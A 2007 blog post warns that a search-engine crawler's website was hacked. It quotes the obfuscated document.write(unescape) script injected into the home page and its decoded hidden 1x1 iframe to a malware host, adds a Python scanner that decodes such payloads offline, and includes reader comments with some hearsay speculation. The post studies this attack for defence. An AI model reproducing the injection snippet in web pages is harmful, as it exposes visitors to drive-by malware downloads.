Friday, January 05, 2007

Bot Hunters Beware: Search Engine Site Hacked

Beware when investigating user agents and referrers that show up in your log files, because you could end up infected with a virus!

This little crawler left its calling card:

38.99.203.110 "panscient.com"
A quick trip to the Panscient site shows it has been hacked, and the home page has this JavaScript inserted at the top of the file:
<script language="javascript"> document.write(
unescape('%3C%69%66%72%61%6D%65%20%73%72%63%3D%20%68%74%74%70%3A%2F%2F%38%31%2E%39%35%2E%31%34%36%2E%39%38%2F%69%6E%64%65%78%2E%68%74%6D%6C%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%22%30%22%20%77%69%64%74%68%3D%22%31%22%20%68%65%69%67%68%74%3D%22%31%22%20%73%63%72%6F%6C%6C%69%6E%67%3D%22%6E%6F%22%20%6E%61%6D%65%3D%63%6F%75%6E%74%65%72%3E%3C%2F%69%66%72%61%6D%65%3E') ); </script>
When decoded, that JavaScript writes a hidden 1x1 iframe into the page, pointing at the source of the downloader virus:
<iframe src= http://81.95.146.98/index.html
frameborder="0" width="1" height="1" scrolling="no"
name=counter></iframe>
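Because the iframe is only written by document.write() at run time, a fetch with JavaScript off (or a plain grep of the saved page) shows nothing but the percent-encoded blob, which is exactly why disabling JavaScript while bot hunting keeps the analyst safe. The scanner below, an added example that is not code from the original post or from Panscient, decodes the unescape() payload offline without executing it and flags iframes that are sized 1x1 or styled hidden. The sample page is constructed: the script block is the one quoted above, while the surrounding title and body text are invented filler so the example runs on its own.

```python
"""
Static scanner for document.write(unescape(...)) iframe injections.
Added example, not code from the post or from Panscient. The payload is
decoded in Python and never executed, and nothing is fetched from the
decoded src, so it is safe to run against a saved copy of a hacked page.
"""
import re

# Constructed sample page: the <script> block is the one quoted in the post,
# the rest of the markup is invented filler for a runnable example.
SAMPLE_HTML = """<html><head><title>Panscient</title>
<script language="javascript"> document.write(
unescape('%3C%69%66%72%61%6D%65%20%73%72%63%3D%20%68%74%74%70%3A%2F%2F%38%31%2E%39%35%2E%31%34%36%2E%39%38%2F%69%6E%64%65%78%2E%68%74%6D%6C%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%22%30%22%20%77%69%64%74%68%3D%22%31%22%20%68%65%69%67%68%74%3D%22%31%22%20%73%63%72%6F%6C%6C%69%6E%67%3D%22%6E%6F%22%20%6E%61%6D%65%3D%63%6F%75%6E%74%65%72%3E%3C%2F%69%66%72%61%6D%65%3E') ); </script>
</head><body><p>Custom search engines for your site.</p></body></html>"""

# unescape('...') or unescape("...") literals inside script text.
UNESCAPE_RE = re.compile(r"unescape\(\s*(['\"])(.*?)\1\s*\)", re.S)
# Any <iframe ...> start tag in decoded markup.
IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.I)
# name=value pairs: double-quoted, single-quoted, or bare (tolerates 'src= url').
ATTR_RE = re.compile(r"""(\w+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""")


def js_unescape(text):
    """Mimic JavaScript's unescape(): %uXXXX first, then %XX, each to one char."""
    text = re.sub(r"%u([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), text)
    return re.sub(r"%([0-9a-fA-F]{2})", lambda m: chr(int(m.group(1), 16)), text)


def decode_payloads(html):
    """Return the decoded string of every unescape('...') literal in the page."""
    return [js_unescape(m.group(2)) for m in UNESCAPE_RE.finditer(html)]


def parse_attrs(tag):
    """Parse attributes from one start tag into a lower-cased dict."""
    attrs = {}
    for name, dq, sq, bare in ATTR_RE.findall(tag):
        attrs[name.lower()] = dq or sq or bare
    return attrs


def is_hidden(attrs):
    """True for frames at most 1x1 pixels or hidden via inline style."""
    w, h = attrs.get("width", ""), attrs.get("height", "")
    tiny = w.isdigit() and h.isdigit() and int(w) <= 1 and int(h) <= 1
    style = attrs.get("style", "").replace(" ", "").lower()
    return tiny or "display:none" in style or "visibility:hidden" in style


def hidden_iframes(markup):
    """Return the src of every hidden iframe found in a decoded markup string."""
    targets = []
    for m in IFRAME_RE.finditer(markup):
        attrs = parse_attrs(m.group(0))
        if "src" in attrs and is_hidden(attrs):
            targets.append(attrs["src"])
    return targets


def scan(html):
    """Compare what a non-JS view sees with what the decoded payloads would inject."""
    targets = []
    for payload in decode_payloads(html):
        targets.extend(hidden_iframes(payload))
    return {
        # A plain grep of the saved page finds no iframe at all.
        "iframe_in_raw_html": "<iframe" in html.lower(),
        # The injected frame only appears after decoding the payload.
        "hidden_iframe_targets": targets,
    }


if __name__ == "__main__":
    result = scan(SAMPLE_HTML)
    print("iframe visible in raw HTML:", result["iframe_in_raw_html"])
    for src in result["hidden_iframe_targets"]:
        print("hidden iframe loads:", src)
```

Run it against a page saved with curl or wget rather than a browser, and treat any decoded target as hostile: record the IP or host for blocking and reporting, and do not open it in a JavaScript-enabled browser.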
Thanks to John Andrews for the tip that they were hacked and spreading a virus. I've been to Panscient's site before and didn't notice anything wrong, but it was definitely infected when I went there today!

Just heed this as a cautionary tale: things in your log file could be a lure planted by hackers to infect you with something not currently detected by virus scanners, which is a good reason I disable JavaScript when I do most of my bot hunting.

Besides, who better to hack and humiliate than the very people that battle these vermin on a daily basis?

So bot busters BEWARE!

UPDATE - I checked other domains on the server and it's hacked all over the place. Hard to believe that a company selling custom search engines doesn't even have their own dedicated server, just weird.

12 comments:

Scott Allen said...

I got hit by this today as well.

mojomike said...

could you hint at the virus detection software you are using?

John Andrews said...

Seems to be fixed already at panscient, Bill. I also checked a pair of the other hijacked domains on that server and they are clean as well.

Good work letting them know.

WillMacc said...

I've got a guy on my blog that says he's the CEO of panscient.
Something doesn't add up. As soon as I post something about Cogent, PSI and Sproose, the "CEO" pops up and you post this.....
Odd.... Smells Phishy..

Jonathan Baxter said...

Hard to believe that a company selling custom search engines doesn't even have their own dedicated server, just weird.

It's just more to manage if we have our own server. www.panscient.com doesn't get huge traffic, so it is cheaper to pay $10/month to a hosting provider than to do it ourselves. Or at least it was until we got hacked...

Thanks for the heads-up.

- Jonathan Baxter

Billy The Blogging Poet said...

Here's an idea that would stop spam forever.
http://bloggingpoet.squarespace.com/bloggingpoetcom/2007/1/9/the-anti-spam-reserves-finally-an-end-to-spam.html

IncrediBILL said...

Sorry John Andrews, iPowerWeb didn't clean up the server, only cleaned the few accounts I reported. The server still has this infestation in many accounts.

P.S. Glad to see panscient moved as this problem isn't fixed.

Johann said...

I blogged extensively about panscient.com in the past, including the claims by their CEO.

I've been blocking them for ages.

Jonathan Baxter said...

Johann, please check out this comment I just left on your blog.

- Jonathan Baxter

Anonymous said...

I was hammered by this bot a few days ago and it tripped my trap. I found this information too. It makes you wonder about these places that use mail drops for their business addresses:

The address listed for this company is nothing more than a "virtual office" or "mail drop" at Alliance Business Centers, 620 Herndon Parkway Suite 200, Herndon VA 20170.

Why would a company claiming to be a normal business be using a mail drop in Herndon, Virginia? Good question. I know that there are a lot of U.S. Government contractors and sub-contractors in the Herndon VA area. Coincidence? I think not.

^38. seems to have a lot of problems and isn't it so nice that one company, Cogentco, based in Washington DC, seems to own all of ^38.

I say 403 to ^38. and I think it is a storefront.

Anonymous said...

Has anybody had any bad experiences with a company called Websense violating robots.txt and sucking a server dry?

A friend of mine told me that he has a friend who used to work for them, and he told me that if you block them at .htaccess they will use partner companies and companies that use their subscription services to go around your .htaccess. As I understand it they will even use servers from state and local governments that subscribe to Websense to hit your site. I don't know if that is true, but I had odd searches after I blocked Websense that acted like a bot.

Any help would be appreciated because I don't appreciate a company that is involved in censorship stepping on my server.

IncrediBILL said...

Funny you mention WebSense as I've just been investigating WebSense's activity lately and looking into blocking some of this nonsense.

May post about it real soon...